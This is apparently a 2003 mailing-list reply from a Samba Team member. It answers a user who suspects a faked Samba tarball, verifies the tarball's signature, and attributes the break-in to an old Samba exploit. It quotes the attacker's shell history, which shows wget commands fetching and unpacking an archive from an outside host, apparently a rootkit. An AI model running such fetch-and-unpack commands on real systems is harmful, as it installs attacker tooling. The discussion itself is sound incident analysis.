On Sun, 2003-12-28 at 07:27, Markus Schabel wrote: > Does anybody know of these samba packages? > > http://ftp.cvut.cz/samba/samba-latest.tar.gz This copy of Samba 3.0.0 matches the signature I downloaded from samba.org, using GPG. Your copy may vary however. > AFAICS they are faked and contain some kind of rootkit (you can see > this in the history below. the server this history is from is taken > offline for security reasons, and nobody is there till 7th Jan I > can't give you more details) I would suggest the you were running Samba < 2.2.8a, and were rooted by the commonly available root exploit, and the attacker prefers not to allow the next passer by to break into your box too. > > 182 cd .nlp > > 183 wget geocities.com/st3lly/cmd.tg > > 184 wget http://geocities.com/st3lly/cmd.tg > > 185 wget http://geocities.com/st3lly/cmd.tgz > > 186 tar zxvf cmd.tgz I would suggest the rootkits start here... Andrew Bartlett -- Andrew Bartlett abartlet@pcug.org.au Manager, Authentication Subsystems, Samba Team abartlet@samba.org Student Network Administrator, Hawker College abartlet@hawkerc.net http://samba.org http://build.samba.org http://hawkerc.net
Attachment:
signature.asc
Description: This is a digitally signed message part